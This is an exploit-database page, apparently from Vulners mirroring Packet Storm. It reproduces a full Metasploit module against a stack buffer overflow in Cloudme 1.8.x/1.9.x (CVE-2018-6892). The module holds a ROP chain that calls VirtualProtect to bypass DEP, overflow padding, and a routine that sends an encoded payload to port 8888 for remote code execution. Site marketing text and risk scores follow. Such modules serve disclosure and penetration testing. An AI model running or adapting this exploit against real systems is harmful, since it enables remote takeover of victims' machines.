Lucene search
K

Cloudme 1.9 Buffer Overflow

🗓️ 14 Aug 2018 00:00:00Reported by Raymond WellnitzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Cloudme 1.9 Buffer Overflow Exploi

Related
Code
`# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)  
# Date: 2018-08-13  
# Exploit Author: Raymond Wellnitz  
# Vendor Homepage: https://www.cloudme.com  
# Version: 1.8.x/1.9.x  
# Tested on: Windows 7 x64  
# CVE : 2018-6892  
  
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',  
'Description' => %q{  
This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.  
},  
'Author' => [ 'Raymond Wellnitz' ],  
'References' =>  
[  
[ 'CVE', 'CVE-2018-6892' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Platform' => 'win',  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 600,  
'BadChars' => "\x00"  
},  
'Targets' =>  
[  
[ 'Windows x86_32/64', { 'Ret' => 0x6cfa88a2 } ],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '11.02.2018'))  
  
register_options([ Opt::RPORT(8888) ])  
end  
  
def create_rop_chain()  
rop_gadgets = [  
0x6cf98182, # POP EAX # RETN [icuin49.dll]  
0x68c848d8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]  
0x61b4d226, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]   
0x668d8261, # XCHG EAX,ESI # RETN [libGLESv2.dll]   
0x68a5c297, # POP EBP # RETN [Qt5Core.dll]   
0x688dd45d, # & JMP ESP [Qt5Core.dll]  
0x68abe868, # POP EAX # RETN [Qt5Core.dll]  
0xfffffdff, # 201  
0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]  
0x689687d2, # XCHG EAX,EBX # RETN  
0x68abe868, # POP EAX # RETN [Qt5Core.dll]  
0xffffffc0, # 40  
0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]  
0x6751d479, # XCHG EAX,EDX # RETN [icuuc49.dll]  
0x100010c7, # POP ECX # RETN [LIBEAY32.dll]  
0x6494ea0a, # &Writable location [libwinpthread-1.dll]  
0x68a49534, # POP EDI # RETN [Qt5Core.dll]   
0x1008df82, # RETN (ROP NOP) [LIBEAY32.dll]  
0x68ad025b, # POP EAX # RETN [Qt5Core.dll]  
0x90909090, # NOPS  
0x6759bdb4, # PUSHAD # RETN [icuuc49.dll]   
].flatten.pack("V*")  
return rop_gadgets  
end  
  
def exploit  
connect  
  
sploit = rand_text_alpha_upper(1036)  
sploit << create_rop_chain()  
sploit << make_nops(30)  
sploit << payload.encoded  
  
print_status("Trying target #{target.name}...")  
sock.put(sploit + "\r\n\r\n")  
  
handler  
disconnect  
end  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Aug 2018 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.93597
29